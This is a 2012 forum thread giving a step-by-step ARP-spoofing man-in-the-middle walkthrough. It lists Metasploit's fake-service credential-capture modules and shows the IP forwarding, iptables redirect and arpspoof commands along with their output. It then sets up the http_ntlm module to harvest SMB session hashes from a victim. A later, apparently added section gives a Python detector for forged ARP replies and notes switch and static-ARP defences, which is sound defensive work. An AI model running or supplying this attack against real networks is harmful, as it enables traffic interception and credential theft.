38: Man-in-the-Middle Attacks: dsniff Port Spoofing Combined with MSF
Posted on 2012-8-12 22:55:37

Sorry, my computer has been broken for the past few days. Damn.

First, Metasploit's spoofing modules:

    use auxiliary/server/capture/ftp   // fake FTP
    use auxiliary/server/capture/http   // fake HTTP
    use auxiliary/server/capture/http_javascript_keylogger   // fake login page that logs passwords
    use auxiliary/server/capture/http_ntlm   // fake HTTP service that captures SMB session hashes
    use auxiliary/server/capture/imap   // fake IMAP
    use auxiliary/server/capture/pop3   // fake mailbox
    use auxiliary/server/capture/smb   // fake share
    use auxiliary/server/capture/smtp   // fake SMTP
    use auxiliary/server/capture/telnet   // fake TELNET

Decided what to fake? I want to fake an HTTP service on port 8080 that captures SMB session hashes. First, do the port spoofing for 8080:

    root@Dis9Team:~# echo 1 > /proc/sys/net/ipv4/ip_forward
    root@Dis9Team:~# iptables -t nat -A PREROUTING -p tcp --dport 8080 -j REDIRECT
    root@Dis9Team:~# iptables -A FORWARD -j ACCEPT
    root@Dis9Team:~# arpspoof -t 5.5.5.129 5.5.5.2
    0:c:29:84:4c:9d 0:c:29:eb:f8:94 0806 42: arp reply 5.5.5.2 is-at 0:c:29:84:4c:9d
    0:c:29:84:4c:9d 0:c:29:eb:f8:94 0806 42: arp reply 5.5.5.2 is-at 0:c:29:84:4c:9d

Go into MSF and set it up:

    msf  auxiliary(http_ntlm) > show options

    Module options (auxiliary/server/capture/http_ntlm):

       Name        Current Setting   Required  Description
       ----        ---------------   --------  -----------
       CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format
       CHALLENGE   1122334455667788  yes       The 8 byte challenge
       JOHNPWFILE                    no        The prefix to the local filename to store the hashes in JOHN format
       SRVHOST     0.0.0.0           yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
       SRVPORT     8080              yes       The local port to listen on.
       SSL         false             no        Negotiate SSL for incoming connections
       SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
       SSLVersion  SSL3              no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
       URIPATH                       no        The URI to use for this exploit (default is random)

    msf  auxiliary(http_ntlm) > set URIPATH /
    URIPATH => /
    msf  auxiliary(http_ntlm) > exploit
    [*] Auxiliary module execution completed

    [*] Using URL: http://0.0.0.0:8080/
    [*]  Local IP: http://5.5.5.128:8080/
    [*] Server started.
    msf  auxiliary(http_ntlm) >

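When the target visits anything on port 8080, it gets hijacked to the local machine.

Watch the MSF console and get the hash.

Only after playing a thousand tunes can one understand music; only after examining a thousand swords can one judge a blade.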
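Posted on 2012-8-12 23:31:02
Use dsniff's arpspoof to start the network switching: arpspoof -t target gateway
Only after playing a thousand tunes can one understand music; only after examining a thousand swords can one judge a blade.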
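
Seen from the defender's side, the arpspoof output in the first post is itself the detection signal: the gateway address 5.5.5.2 suddenly resolves to a different MAC. The following is an added example (not part of the original thread) that parses lines in that format and flags changed IP-to-MAC bindings and MACs answering for several IPs; the gateway's real MAC and the first two sample lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Matches the "arp reply <ip> is-at <mac>" text printed by dsniff's arpspoof.
ARP_REPLY = re.compile(
    r"arp reply (\d{1,3}(?:\.\d{1,3}){3}) is-at ((?:[0-9a-f]{1,2}:){5}[0-9a-f]{1,2})",
    re.IGNORECASE,
)

def norm_mac(mac):
    """Zero-pad octets so '0:c:29:84:4c:9d' equals '00:0c:29:84:4c:9d'."""
    return ":".join(f"{int(octet, 16):02x}" for octet in mac.split(":"))

def find_arp_conflicts(lines, baseline=None):
    """Return (changed, shared).

    changed: de-duplicated (ip, expected_mac, claimed_mac) tuples.
    shared:  mac -> sorted IPs, for MACs answering for more than one IP.
    baseline: optional trusted ip -> mac map (e.g. the gateway's real MAC).
    """
    known = {ip: norm_mac(mac) for ip, mac in (baseline or {}).items()}
    ips_by_mac = defaultdict(set)
    for ip, mac in known.items():
        ips_by_mac[mac].add(ip)
    changed = []
    for line in lines:
        m = ARP_REPLY.search(line)
        if not m:
            continue
        ip, mac = m.group(1), norm_mac(m.group(2))
        expected = known.setdefault(ip, mac)  # first sighting becomes the reference
        if expected != mac and (ip, expected, mac) not in changed:
            changed.append((ip, expected, mac))
        ips_by_mac[mac].add(ip)
    shared = {mac: sorted(ips) for mac, ips in ips_by_mac.items() if len(ips) > 1}
    return changed, shared

SAMPLE = [
    # constructed: the gateway's genuine reply before spoofing starts
    "0:50:56:e1:2:3 0:c:29:eb:f8:94 0806 42: arp reply 5.5.5.2 is-at 0:50:56:e1:2:3",
    # constructed: host 5.5.5.128 answering for its own address
    "0:c:29:84:4c:9d 0:c:29:eb:f8:94 0806 42: arp reply 5.5.5.128 is-at 0:c:29:84:4c:9d",
    # from the post: repeated forged replies claiming the gateway address
    "0:c:29:84:4c:9d 0:c:29:eb:f8:94 0806 42: arp reply 5.5.5.2 is-at 0:c:29:84:4c:9d",
    "0:c:29:84:4c:9d 0:c:29:eb:f8:94 0806 42: arp reply 5.5.5.2 is-at 0:c:29:84:4c:9d",
]

if __name__ == "__main__":
    print(find_arp_conflicts(SAMPLE))
```

Without a baseline or an earlier genuine reply, the forged lines alone raise no alert, so the gateway's binding should be pinned in advance. Dynamic ARP Inspection on the switch or a static ARP entry for the gateway on the client prevents the forged binding from being accepted.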
